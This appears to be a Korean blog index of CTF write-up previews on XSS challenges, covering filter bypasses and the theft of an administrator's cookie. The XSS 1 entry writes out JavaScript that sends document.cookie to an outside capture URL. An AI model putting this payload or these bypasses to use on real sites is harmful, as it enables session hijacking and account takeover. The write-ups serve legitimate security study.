정보보안 및 해킹/CTF(40)
-
[Normaltic's CTF] XSS Challenge
취약 유형 : DOM Based XSS 로그인 후 메인 페이지의 공지사항 클릭검색 창에 아무 글자나 검색 후 결과가 어떻게 나오는지 확인검색한 단어 + 에 대한 결과가 없습니다. 라고 결과가 나오는 것 확인 완료해당 결과가 Response에 그대로 찍히는지 확인하기 위해 Burp Suite에서 재확인Response에 그대로 찍히는 것이 아니라 javascript로 document.write라는 것을 이용하여 재조립되고 있음을 확인공격자의 스크립트 삽입에 필요한 특수문자 중 사용 가능 여부 판단특수문자는 필터링 되고 있지 않음 확인 완료. script 필터링 여부 확인script는 필터링 되고 있지 않음 확인 완료. 스크립트 사용 가능 여부를 확인하기 위해 alert(1) 삽입하여 확인alert(1)의 ..
2024.06.25 -
[Normaltic's CTF] XSS5
취약 유형 : Stored XSS 로그인 후 메인페이지에 있는 공지사항 클릭공지사항 글쓰기 클릭공격자의 스크립트 삽입에 필요한 특수문자 중 사용 가능 여부 판단가 각각 <, >로 인코딩 되고 있음을 확인. Response를 보니 글을 쓰는 단계에서 javascript로 변환해주고 있음을 확인script 필터링 여부 확인alert(1) 필터링 여부 확인script, alert(1) 전부 필터링 되고 있지 않음 확인 완료. 글을 읽는 단계에서 <와 >를 각각 와 >로 수정해도 스크립트로써 작동하는지 확인하기 위해 intercept를 걸고 확인공격 코드를 담은 새로운 글 작성과 동시에 인코딩에 걸리는 와 >를 원래 글자로 바꿔주는 작업을 동시에 진행하기 위해 intercept를 걸고 글..
2024.06.25 -
[Normaltic's CTF] XSS4
취약 유형 : Stored XSS 로그인 후 메인페이지의 공지사항 클릭공지사항 글쓰기 클릭공격자의 스크립트 삽입에 필요한 특수문자 중 사용 가능 여부 판단특수문자 중에는 인코딩 되는 것 없음 확인. 를 삽입하여 사용 가능 여부 판단script라는 글자가 필터링 되고 있음을 확인. 대문자로 변경하여 재시도대문자 SCRIPT는 사용가능함을 확인. 와 alert(1)로 스크립트 삽입 가능 여부 판단alert이 필터링 되고 있음을 확인. 따라서 스크립트 사용 가능 여부는 alert으로 확인 불가. prompt로 재시도prompt는 필터링 되고 있지 않음 확인 완료. 스크립트 사용 가능 확인 완료. 공격 코드 삽입공격코드가 Burp Suite에서 스크립트로써 보이고 있음을 확인. 해당 url을 복사하여 관리자가..
2024.06.25 -
[Normaltic's CTF] XSS3
취약 유형 : Reflected XSS 로그인 후 메인페이지에 있는 마이페이지 클릭마이페이지의 user=ID가 그대로 화면에 출력되고 있는 것을 확인Burp Suite에서 재확인 후 user라는 변수 변경 시도를 위해 Repeater로 보낸 후 변경user= 뒤에 있는 변수에 따라서 Response의 값이 그대로 변한다는 것이 확인되어, 해당 변수에서 간단하게 alert(1)을 띄우는 코드 삽입공격자의 스크립트가 그대로 삽입되어 스크립트가 실행됨을 확인. alert(1)을 삭제하고 관리자의 쿠키값을 가져오기 위해 쿠키값을 가져오는 공격코드를 함수로 만들어서 삽입만들어진 공격 url을 복사하여 관리자가 방문하는 곳에 붙여넣어 방문하게 함공격자의 스크립트가 실행되어 관리자의 쿠키를 가져옴
2024.06.25 -
[Normaltic's CTF] XSS 2
취약 유형 : Reflected XSS 로그인 후 메인페이지에 있는 공지사항 클릭검색 창에 글자 입력 후 Burp Suite에서 결과값 확인결과값이 이미 alert()으로 감싸져 있기 때문에 는 불필요. 따라서 앞의 alert()에서는 1을 도출시키고, 뒤의 ‘에 대한 검색 결과과 존재하지 않습니다’ 문구를 날리기 위해 if문으로 다시 한 번 조건을 걸어줌. 조건이 제대로 걸리는지 확인하기 위해 alert(1)을 추가2개의 alert(1)창 확인 완료. 공격자의 스크립트가 제대로 작동하고 있음을 확인함앞의 alert창은 그대로 1을 띄우도록 두고, 뒤의 조건문에서 공격 코드 삽입POST 방식의 링크를 Reflected XSS로 사용하기 위해 Repeater로 보낸 후 Change request metho..
2024.06.25 -
[Normaltic's CTF] XSS 1
취약 유형 : Stored XSS 로그인 후 메인페이지에 있는 공지사항 클릭공지사항 글쓰기 클릭공격자의 스크립트 삽입에 필요한 특수문자 중 사용 가능 여부 판단VPS에서 발듭받은 링크 확인특수문자가 인코딩 되지 않는 title쪽에 와 공격코드 삽입var cookieData = document.cookie; //쿠키데이터를 cookiData라는 변수에 담음var i = new Image(); //새 이미지를 생성 및 loadi.src = 'https://enofjwwq6hvui.x.pipedream.net/?cookie=' + cookieData; //이미지의 경로는 VPS에서 발급받은 링크 + cookieData해당 글의 url을 관리자가 방문할 수 있는 곳으로 옮겨 방문하도록 함해당 공격 코드가 담긴..
2024.06.25